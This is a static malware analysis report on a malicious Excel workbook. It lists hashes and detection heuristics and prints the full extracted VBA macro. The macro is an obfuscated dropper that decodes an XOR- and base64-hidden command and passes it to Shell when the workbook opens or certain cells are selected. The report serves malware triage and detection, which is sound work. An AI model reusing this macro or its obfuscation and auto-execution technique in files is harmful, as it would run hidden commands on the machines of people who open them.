Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8f53db66153b48d1…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 34.2 KB
Created: 2020-06-13 08:08:44 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-05-04
MD5: e0a21fe4df4bd49bb0408c15d8d25cf5
SHA-1: 81eedb19ec7631341ac46e82a2b4d6a93dd9dd5c
SHA-256: 8f53db66153b48d195e91da62399c35b5510365b06dc620e0606c5655bddb3d2
Risk score: 138

Heuristics (6)

  • VBA project inside OOXML (severity: medium, 4 related findings, rule OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA (severity: critical, rule OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script
    Shell (NbOFLQWnVyGLP)
  • VBA p-code auto-exec with execution tokens (severity: high, rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro (severity: low, rule OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro (severity: low, rule OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Suspicious extracted artifact (severity: info, rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 9544 bytes
SHA-256: 6e81027a7f2d187a9a836793f67ae6963db0e627f324406823e17347338dc8fd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Private DkaQJYEvUYO       As Boolean
Private SJYxSzFTNVZuHH((0 + 0) To 63) As Byte
Private RPjBrNfjQJQ(0 To 127) As Byte
Sub TempO()
Dim NbOFLQWnVyGLP As String
Dim UNjiLbjKSJgxR As String
NbOFLQWnVyGLP = UVlxYakZNJvmu(Array((173 Xor 75), (37 Xor 3), (108 + (40 Xor 97)), (54 Xor 210), ((38 Xor 68) + 11), (152 + (13 Xor 25)), 94, (81 Xor 218), 193, (30 + (26 Xor 57)), (109 Xor 17), (84 + 52), (41 Xor 72), (47 Xor 85), (8 + (3 Xor 4)), ((47 Xor 161) + 42), (6 Xor 46), (162 + 90), (63 + 175), ((6 Xor 30) + (60 Xor 0)), ((19 Xor 37) + 115), (134 Xor 84), ((150 Xor 8) + 72), (62 Xor 114), ((1 Xor 3) + 6), (113 Xor 143), (6 Xor 149), (16 Xor 51), ((126 Xor 233) + (32 Xor 24)), (10 + (123 Xor 189)), ((62 Xor 113) + (35 Xor 30)), _
((0 Xor 1) + (0 Xor 0)), ((36 Xor 12) + (18 Xor 48)), 140, (32 + (28 Xor 121)), (145 + (43 Xor 23)), ((19 Xor 79) + (37 Xor 111)), 171, (29 + 4), ((37 Xor 70) + (43 Xor 16)), (24 Xor 224), (2 Xor 4), (17 + (49 Xor 109)), (30 Xor 222), ((19 Xor 59) + (6 Xor 43)), 150, 6, (4 Xor 105), ((13 Xor 93) + (15 Xor 0)), 182, (145 + 10), (2 Xor 110), ((110 Xor 174) + (0 Xor 3)), (9 + (4 Xor 3)), (154 Xor 102), (3 Xor 5), 246, ((31 Xor 197) + 0), ((9 Xor 7) + (3 Xor 10)), 143, (73 Xor 17), (56 Xor 176), (12 + (144 Xor 76)), 242, ((0 Xor 2) + 48), _
((18 Xor 50) + (156 Xor 94)), 17, 46, ((26 Xor 138) + 46), ((8 Xor 31) + (0 Xor 19)), (52 Xor 135), ((9 Xor 46) + 137), (40 + (63 Xor 85)), (54 + 16), (25 Xor 170), (8 + 66), (49 Xor 129), ((14 Xor 21) + (2 Xor 13)), ((95 Xor 41) + (57 Xor 127)), (10 Xor 150), (52 Xor 97), 224, 155, (29 Xor 139), (27 Xor 5), ((52 Xor 175) + 94), (140 + 80), (138 Xor 93), 120, ((4 Xor 21) + (39 Xor 162)), 12, (33 Xor 118), 237), (0 Xor 0)) & UVlxYakZNJvmu(Array((231 Xor 0), (10 Xor 45), 179, (9 Xor 176), (76 + 90), (138 + 20), (162 + (34 Xor 20)), 38, ((12 Xor 28) + (0 Xor 0)), _
((2 Xor 1) + 19), ((49 Xor 2) + 28), ((15 Xor 45) + 163), ((19 Xor 4) + 73), 141, (113 + (4 Xor 0)), ((2 Xor 1) + 196), (58 + 30), ((13 Xor 29) + 16), (21 + 7), ((146 Xor 9) + 32), ((0 Xor 5) + 8), (231 + 8), (46 Xor 28), (0 + 0), ((12 Xor 92) + 7), ((128 Xor 40) + (6 Xor 45)), 208, ((44 Xor 18) + (58 Xor 65))), 93)
Shell (NbOFLQWnVyGLP)
End Sub
Sub AutoOpen()
TempO
End Sub
Sub Workbook_Open()
TempO
End Sub
Public Function XwsKnjVlxOKzk(ByVal yXLbAgtEScAMy As String) As Byte()
If Not DkaQJYEvUYO Then QgFmXbBVZl
Dim DPlBHOBncF() As Byte: DPlBHOBncF = zgeOdrdtuuRW(yXLbAgtEScAMy)
Dim UaQDmqCYTLi As Long: UaQDmqCYTLi = UBound(DPlBHOBncF) + ((1 Xor 0) + (0 Xor 0))
If UaQDmqCYTLi Mod ((3 Xor 0) + (1 Xor 0)) <> ((0 Xor 0) + 0) Then Err.Raise vbObjectError, , ""
Do While UaQDmqCYTLi > (0 + 0)
If DPlBHOBncF(UaQDmqCYTLi - (1 + (0 Xor 0))) <> Asc("=") Then Exit Do
UaQDmqCYTLi = UaQDmqCYTLi - (1 Xor 0)
Loop
Dim SkeDGVkgGPLs As Long: SkeDGVkgGPLs = (UaQDmqCYTLi * (0 Xor 3)) \ (3 + (1 Xor 0))
Dim ObBfmAjiFXujM() As Byte
ReDim ObBfmAjiFXujM(0 To SkeDGVkgGPLs - 1) As Byte
Dim wVbhMGrxJui As Long
Dim sUjKdAIaMuubs As Long
Do While wVbhMGrxJui < UaQDmqCYTLi
Dim uFPKrBXZArq As Byte: uFPKrBXZArq = DPlBHOBncF(wVbhMGrxJui): wVbhMGrxJui = wVbhMGrxJui + (1 + 0)
Dim HwDDCyxcJTdZt As Byte: HwDDCyxcJTdZt = DPlBHOBncF(wVbhMGrxJui): wVbhMGrxJui = wVbhMGrxJui + (1 + 0)
Dim KtJQalviYKodd As Byte: If wVbhMGrxJui < UaQDmqCYTLi Then KtJQalviYKodd = DPlBHOBncF(wVbhMGrxJui): wVbhMGrxJui = wVbhMGrxJui + ((1 Xor 0) + (0 Xor 0)) Else KtJQalviYKodd = Asc("A")
Dim AlMVBDshDPkOGu As Byte: If wVbhMGrxJui < UaQDmqCYTLi Then AlMVBDshDPkOGu = DPlBHOBncF(wVbhMGrxJui): wVbhMGrxJui = wVbhMGrxJui + 1 Else AlMVBDshDPkOGu = Asc("A")
If uFPKrBXZArq > (77 Xor 50) Or HwDDCyxcJTdZt > (50 Xor 77) Or KtJQalviYKodd > ((3 Xor 50) + 78) Or AlMVBDshDPkOGu > ((48 Xor 112) + (5 Xor 58)) Then _
Err.Raise vbObjectError, , ""
Dim DkYNWWxWtfQ As Byte: DkYNWWxWtfQ = RPjBrNfjQJQ(uFPKrBXZArq)
Dim jFmIueonHJh As Byte: jFmIueonHJh = RPjBrNfjQJQ(HwDDCyxcJTdZt)
Dim BGxvpqERLzfc As Byte: BGxvpqERLzfc = RPjBrNfjQJQ(KtJQalviYKodd)
Dim fjSSTzEepFV As Byte: fjSSTzEepFV = RPjBrNfjQJQ(AlMVBDshDPkOGu)
If DkYNWWxWtfQ > ((16 Xor 46) + (0 Xor 1)) Or jFmIueonHJh > (55 Xor 8) Or BGxvpqERLzfc > 63 Or fjSSTzEepFV > 63 Then _
Err.Raise vbObjectError, , ""
Dim eYcItzGTSeLoco As Byte: eYcItzGTSeLoco = (DkYNWWxWtfQ * (0 + 4)) Or (jFmIueonHJh \ &H10)
Dim szPSwOOIENDb As Byte: szPSwOOIENDb = ((jFmIueonHJh And &HF) * &H10) Or (BGxvpqERLzfc \ (3 Xor 7))
Dim qiNcauzEpA As Byte: qiNcauzEpA = ((BGxvpqERLzfc And (2 + (1 Xor 0))) * &H40) Or fjSSTzEepFV
ObBfmAjiFXujM(sUjKdAIaMuubs) = eYcItzGTSeLoco: sUjKdAIaMuubs = sUjKdAIaMuubs + (0 + (1 Xor 0))
If sUjKdAIaMuubs < SkeDGVkgGPLs Then ObBfmAjiFXujM(sUjKdAIaMuubs) = szPSwOOIENDb: sUjKdAIaMuubs = sUjKdAIaMuubs + 1
If sUjKdAIaMuubs < SkeDGVkgGPLs Then ObBfmAjiFXujM(sUjKdAIaMuubs) = qiNcauzEpA: sUjKdAIaMuubs = sUjKdAIaMuubs + (0 + 1)
Loop
XwsKnjVlxOKzk = ObBfmAjiFXujM
End Function
Private Sub QgFmXbBVZl()
Dim WAhFtXROTYyu As Integer, dZyznuTXBQB As Integer
dZyznuTXBQB = ((0 Xor 0) + 0)
For WAhFtXROTYyu = Asc("A") To Asc("Z"): SJYxSzFTNVZuHH(dZyznuTXBQB) = WAhFtXROTYyu: dZyznuTXBQB = dZyznuTXBQB + 1: Next
For WAhFtXROTYyu = Asc("a") To Asc("z"): SJYxSzFTNVZuHH(dZyznuTXBQB) = WAhFtXROTYyu: dZyznuTXBQB = dZyznuTXBQB + 1: Next
For WAhFtXROTYyu = Asc("0") To Asc("9"): SJYxSzFTNVZuHH(dZyznuTXBQB) = WAhFtXROTYyu: dZyznuTXBQB = dZyznuTXBQB + ((0 Xor 0) + (0 Xor 1)): Next
SJYxSzFTNVZuHH(dZyznuTXBQB) = Asc("+"): dZyznuTXBQB = dZyznuTXBQB + (1 Xor 0)
SJYxSzFTNVZuHH(dZyznuTXBQB) = Asc("/"): dZyznuTXBQB = dZyznuTXBQB + (1 Xor 0)
For dZyznuTXBQB = (0 + 0) To ((18 Xor 55) + (25 Xor 67)): RPjBrNfjQJQ(dZyznuTXBQB) = (102 Xor 153): Next
For dZyznuTXBQB = ((0 Xor 0) + 0) To (60 + 3): RPjBrNfjQJQ(SJYxSzFTNVZuHH(dZyznuTXBQB)) = dZyznuTXBQB: Next
DkaQJYEvUYO = True
End Sub
Private Function zgeOdrdtuuRW(ByVal yXLbAgtEScAMy As String) As Byte()
Dim jFmIueonHJh() As Byte: jFmIueonHJh = yXLbAgtEScAMy
Dim rIKlnrSBHoCc As Long: rIKlnrSBHoCc = (UBound(jFmIueonHJh) + ((0 Xor 1) + 0)) \ (1 Xor 3)
If rIKlnrSBHoCc = (0 Xor 0) Then zgeOdrdtuuRW = jFmIueonHJh: Exit Function
Dim BGxvpqERLzfc() As Byte
ReDim BGxvpqERLzfc(0 To rIKlnrSBHoCc - ((0 Xor 0) + 1)) As Byte
Dim CuXoYJhVOiyAdc As Long
For CuXoYJhVOiyAdc = 0 To rIKlnrSBHoCc - ((0 Xor 0) + (0 Xor 1))
Dim WAhFtXROTYyu As Long: WAhFtXROTYyu = jFmIueonHJh(2 * CuXoYJhVOiyAdc) + (7 Xor 263) * CLng(jFmIueonHJh((2 + 0) * CuXoYJhVOiyAdc + 1))
If WAhFtXROTYyu >= (121 Xor 377) Then WAhFtXROTYyu = Asc("?")
BGxvpqERLzfc(CuXoYJhVOiyAdc) = WAhFtXROTYyu
Next
zgeOdrdtuuRW = BGxvpqERLzfc
End Function
Private Function UVlxYakZNJvmu(PKwCTohBdjO As Variant, JUknoaTyrV As Integer)
Dim kDmnOyNBuSuCo As String
Dim oXQDRzHXtmEcgc() As Byte
oXQDRzHXtmEcgc = XwsKnjVlxOKzk("lknCgR/fNu6tLVLtGR8vmgqLiTHd8o44fI6pDODhtTNkvbP1iJ8SsMsyQoI08igIJ9O7QaxliGCftnKveqqtyG6LZFriE4qdoBr9L8Rd0+4+v+jzfYyuvgzvUDuMhQqB5dL7q1JMVC6hTugNonoCJ5VRrVNkebao3A==")
kDmnOyNBuSuCo = ""
For dZyznuTXBQB = LBound(PKwCTohBdjO) To UBound(PKwCTohBdjO)
kDmnOyNBuSuCo = kDmnOyNBuSuCo & Chr(oXQDRzHXtmEcgc(dZyznuTXBQB + JUknoaTyrV) Xor PKwCTohBdjO(dZyznuTXBQB))
Next
UVlxYakZNJvmu = kDmnOyNBuSuCo
End Function


Attribute VB_Name = "Module2"





Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit

Private Sub Worksheet_SelectionChange(ByVal Target As Range)
    If Selection.Count = 1 Then
        If Not Intersect(Target, Range("D420")) Is Nothing Then
            Call ghd
        End If
    End If
End Sub






Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False





Attribute VB_Name = "ThisWorkbook1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Attribute VB_Name = "ThisWorkbook2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
 
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
    If Selection.Count = 1 Then
        If Not Intersect(Target, Range("M1337")) Is Nothing Then
            Call TempO
        End If
    End If
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 62976 bytes
SHA-256: 51ab5cce9288546aedb8e14deb8d61781988e59553473a35f25a01ad2784e911
Detection
ClamAV: No threats found
Obfuscation or payload: likely
362 of 569 identifiers look randomly generated (e.g. 'fNu6tLVLtGR8vmgqLiTHd8o44fI6pDODhtTNkvbP'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).